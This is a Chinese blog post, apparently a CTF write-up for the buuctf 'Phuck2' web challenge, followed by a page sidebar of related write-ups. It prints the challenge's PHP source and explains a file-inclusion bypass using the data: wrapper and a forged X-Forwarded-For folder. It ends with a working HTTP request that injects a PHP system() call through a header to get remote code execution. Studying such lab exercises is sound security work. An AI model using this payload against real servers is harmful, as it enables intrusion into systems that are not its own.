buuctf Phuck2

最新推荐文章于 2022-08-08 22:15:00 发布
最新推荐文章于 2022-08-08 22:15:00 发布
阅读量621 收藏
点赞数 1
分类专栏: buuctf ctf 刷题日记 文章标签: buuctf
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_45642610/article/details/121110314
版权
ctf 同时被 3 个专栏收录
27 篇文章 3 订阅
订阅专栏
buuctf
26 篇文章 2 订阅
订阅专栏
刷题日记
24 篇文章 2 订阅
订阅专栏 
 <?php
    stream_wrapper_unregister('php');
    if(isset($_GET['hl'])) highlight_file(__FILE__);

    $mkdir = function($dir) {
        system('mkdir -- '.escapeshellarg($dir));
    };
    $randFolder = bin2hex(random_bytes(16));
    $mkdir('users/'.$randFolder);
    chdir('users/'.$randFolder);

    $userFolder = (isset($_SERVER['HTTP_X_FORWARDED_FOR']) ? $_SERVER['HTTP_X_FORWARDED_FOR'] : $_SERVER['REMOTE_ADDR']);
    $userFolder = basename(str_replace(['.','-'],['',''],$userFolder));

    $mkdir($userFolder);
    chdir($userFolder);
    file_put_contents('profile',print_r($_SERVER,true));
    chdir('..');
    $_GET['page']=str_replace('.','',$_GET['page']);
    if(!stripos(file_get_contents($_GET['page']),'<?') && !stripos(file_get_contents($_GET['page']),'php')) {
        include($_GET['page']);
    }

    chdir(__DIR__);
    system('rm -rf users/'.$randFolder);
?>

前面的都不紧要
关键是这两部分

 $_GET['page']=str_replace('.','',$_GET['page']);
    if(!stripos(file_get_contents($_GET['page']),'<?') && !stripos(file_get_contents($_GET['page']),'php')) {
        include($_GET['page']);
    }

绕过<? 和php字段然后文件包含。

    $userFolder = (isset($_SERVER['HTTP_X_FORWARDED_FOR']) ? $_SERVER['HTTP_X_FORWARDED_FOR'] : $_SERVER['REMOTE_ADDR']);
    $userFolder = basename(str_replace(['.','-'],['',''],$userFolder));

    $mkdir($userFolder);
    chdir($userFolder);
    file_put_contents('profile',print_r($_SERVER,true));

输入有X_FORWARDED_FOR头,则会把它作为路径创建文件夹
file_put_contents('profile',print_r($_SERVER,true));则会把一些环境变量和请求头的一些相关信息输入刚刚创建的文件夹下的profile文件下,这时如果include('profile')则会把这些信息显示出来,并且可以解析php语句, 这样就可以rce了。
这是本地的测试:

<?php
highlight_file(__FILE__);
chdir('./');
file_put_contents('profile.txt',print_r($_SERVER,true));
include("./profile.txt");

在这里插入图片描述
在这里插入图片描述

回到题目
当allow_url_include=Off时
file_get_contents在处理data:xxx时会直接取xxx
而include会包含文件名为data:xxx的文件

file_get_contents('data:,xx/profile');   --> string 'xx/profile'
include('data:,xx/profile');             --> 'data:,xx/profile'

综上,得出payload :

GET /?page=data:,xx/profile HTTP/1.1
X-Forwarded-For: data:,xx
Get-Flag: <?php system('/get_flag'); ?>

GET /?page=data:,xx/profile HTTP/1.1
X-Forwarded-For: data:,xx	#创建名字为data:,xx的文件夹

实际上file_get_contents('xx/profile') 不存在xx文件夹,结果为false绕过if判断
然后include(data:,xx/profile),里面是$_SERVER的内容,其中包含下面语句执行的结果

Get-Flag: <?php system('/get_flag'); ?>  #可以输入命令ls /     cat等等 
Get-Flag可以改成其他名字
__byb__
关注
  • 1
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
pottymouth:字典和子词匹配查找针对语言失误
05-07
Pottymouth ####过滤badwords和亵渎内容更聪明 没有依赖关系 AMD,Node和浏览器就绪 Pottymouth会捕获诸如“ sh !!! t”,“ b000000bs”,“ phuck”之类的badwords或任何此类单词的变体形式。 Pottymouth将捕获嵌套的badwords。 Pottymouth试图变得聪明,不要过滤掉诸如“ Cassandra”之类的名字,但是不幸的是,诸如“ Fatima”之类的名字会陷入交火中。 ####安装 NPM,Bower和Git npm install pottymouth bower install pottymouth git clone https://github.com/listenrightmeow/pottymouth ####用法 Pottymouth公开了3种公开的终结点API方法进行验证。 Potty
buu-Phuck2
qaq517384的博客
10-05 392
buu Phuck2 在buu里打开环境是没有任何提示的,url后面加伤?hl才有源码 脑测要fuzz或者原题有hint 先放上师傅的blog https://www.dazhuanlan.com/tvshowwords/topics/958186 直接看源码 <?php stream_wrapper_unregister('php'); if(isset($_GET['hl'])) highlight_file(__FILE__); $mkdir = function($d
BUUCTF reverse2完全面向新手
lei_gentle的博客
10-17 1277
现在我们看reverse2,依旧把它拖进我们的IDA,或许我们也可以先判断有没有壳,随手拖进一个判断壳的软件即可, 然后进入后,习惯性的,我会先使用shift+F12,进入Strings window窗口,然后我注意到了里面有一行 然后双击,跳转页面,然后再右键点击第一行,点击ok,跳转到汇编语言当中,然后按F5,然后我们发现s2和flag比较,然后s2是需要输入的,于是我会尝试双击flag,发现flag里面已经有数值了,于是我们复制那个答案,然后再对flag进行程序的运算 于是顺利得出答案
php分页 带缩进,带多种分页方式的php分页类
weixin_36204407的博客
03-25 72
Class PAGE {//类开始/********************************************************* $total 记录总数* $pageNum 每页显示的条数* $url = '' 链接* $page->StartPage(显示分类统计,字符分类/数字分页,跳转);* $page->StartPage(tru...
攻防世界XCTF:blgdel
末初的CSDN博客
03-13 1763
目录扫描,扫出robots.txt 访问看一下。 访问config.txt 源代码 <?php class master { private $path; private $name; function __construct() { } function stream_open($path) { if(!preg_match('/(.*)\/...
buuctf(探险2)
最新发布
qq_62046696的博客
08-08 812
先上传一个一句话木马.,过滤了然后用可以通过,大概还是过滤了
攻防世界blgdel
qq_63753925的博客
05-26 458
进入环境后是一个购物网站 扫描下网站目录 发现三个线索文件访问看看 upload.php要登陆才可以访问 得到一个创建sql表的参数这个感觉没什么用 发现源代码进行审计 <?php class master { private $path; private $name; function __construct() { } function stream_open($path) { if(!preg_matc...
PHP stream_wrapper_register
weixin_30725467的博客
01-24 578
1 <?php 2 /** 3 * 引用:http://php.net/manual/en/function.stream-wrapper-register.php 4 * 把变量当成文件读写的协议 5 * 6 * Class VariableStream 7 */ 8 class VariableStream 9 ...
php 打印对象到文件,phpfile_put_contents()将数组或对象写入到文件
weixin_27379781的博客
03-24 509
平时做支付回调测试的时候,需要接受一下请求过来的数据,通常就会用到file_put_contents(),但如果直接使用file_put_contents('as.txt',$_POST); 虽然可以接受到数据,但都是没经过格式化的,根本没办法知道相关的键名和值,本文就介绍三种方法:第一:print_r方法$asinfo = array('name' => '傲世','sex' => ...
文件包含漏洞之——str_replace函数绕过与——包含截断绕过
温柔小薛的博客
04-08 6106
str_replace函数绕过 实验环境DVWA,安全性medium 有时程序员会使用str_replace函数进行防御,这个函数是极其不安全的,因为可以使用双写绕过替换规则轻松绕过 绕过方法 例如page=hthttp://tp://192.168.0.103/phpinfo.txt时,str_replace函数会将http://删除,于是page=http://192.168.0.103...
第十三届全国大学生信息安全竞赛(线上初赛)
A_dmin的博客
08-21 9779
第十三届全国大学生信息安全竞赛(线上初赛) WEB easyphp 打开题目拿到源码: 让进程异常退出,进入到phpinfo中 payload: http://eci-2ze4mvter6u3r4shc9j6.cloudeci1.ichunqiu.com/?a=call_user_func&b=pcntl_wait 运行得到phpinfo,找到flag即可: RCEME 貌似有原题,不过过滤的不一样,这道题没有过滤反撇号: <?php error_reporting(0); h
攻防世界web进阶区fakebook详解
hxhxhxhxx的博客
07-24 733
攻防世界web进阶区fakebook详解题目详解tips 题目 详解 注册框很可疑,我们抓包,sqlmap一把梭 python2 sqlmap.py -r wuzi.txt 发现了五个数据库,但是很可惜,都没有我们想要的flag,当我们查看fakebook的内容时,发现是用序列化来存储的 到这里我们思路就断了, 我们再来御剑一把梭 打开flag.php发现并没有什么作用,那么我们继续扫描 这时候,在robots.txt中发现了备份文件 <?php class UserInfo
phpStreams、包装器wrapper 详解
云客的技术博客【云游天下 做客四方】
10-14 5333
Streams这个概念是在php4.3引进的,是对流式数据的抽象,用于统一数据操作,比如文件数据、网络数据、压缩数据等,以使可以共享同一套函数, php的文件系统函数就是这样的共享,比如file_get_contents()函数即可打开本地文件也可以访问url就是这一体现。简单点讲,流就是表现出流式数据行为的资源对象。 以线性方式进行读写,并可以在流里面任意位置进行搜索。
highlight_file函数漏洞
cnbird's blog
07-15 3004
 $file = /etc/passwd;highlight_file($file);?>利用../../../../../../../etc/passwd
PHP7 学习笔记(十二)Stream 函数详解
Tinywan
04-11 2559
&#13; 官方:http://php.net/manual/zh/ref.stream.php Stream_*系列函数   PHP中对流的描述如下:每一种流都实现了一个包装器(wrapper),包装器包含一些额外的代码用来处理特殊的协议和编码。PHP提供了一些内置的包装器,我们也可以很轻松的创建和注册自定义的包装器。我们甚至可以使用上下文(contexts)和过滤器来改...
PHP反序列化笔记
Ms08067安全实验室
01-20 1256
本文作者:是大方子(Ms08067实验室核心成员)﹀﹀﹀目录目录private变量与protected变量序列化后的特点序列化后的字段长度前面可以加+题目解题步骤CVE-2016-712...
buuctf [强网杯 2019]随便注 1
热门推荐
weixin_45642610的博客
01-07 1万+
buuctf web [强网杯 2019]随便注 1 -刷题个人日记 小白一个,写给自己看。 打开后是这样。 从题目和内容来看就是一道sql注入题。 输入 1' or 1=1;# 这个#用来注释掉后面的sql语句 显示所有数据,这个数据有什么用我也不知道,但sql注入一般第一步就是这样看看有没有有用的信息(没有)。 输入 1' order by 2;# 1' order by 3;# 到第3列报错,说明只显示两列。 输入1'; show tables;# 可以看到有 191981093
[ACTF2020 新生赛]Include 1
weixin_45642610的博客
01-10 7741
[ACTF2020 新生赛]Include1 -刷题个人日记 小白一个,写给自己看。 打开后是这样: 点击tips后: ctrl+u查看网页代码+抓包:没有发现什么有用的信息。 查看题目和网址的file参数,提示这是文件包含的题 构造payload: file=php://filter/read=convert.base64-encode/resource=flag.php 读出源码,进行base64解码得出flag: flag{ef7e62e5-5ed4-4f53-8c7c-fb80aaabf7cc}
BUUCTF [极客大挑战 2019]PHP 1
weixin_45642610的博客
01-14 5003
BUUCTF [极客大挑战 2019]PHP 1-刷题日记 进去后是这样: 提示备份,用dirsearch或dirmap扫出来(怎么安装上网找,很多教程,实在不会可以问我(除了dirmap))。搜个大字典下载,自带的字典很少。 py3 dir.py -u http://3c25afd0-8c4a-4832-8e11-f182ffcccae4.node3.buuoj.cn/ -e * -w db/dir.txt -u+地址 -e选择语言 -w选择字典 要多试几次,有时扫不出来,真的坑。(御剑更坑!) 输

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值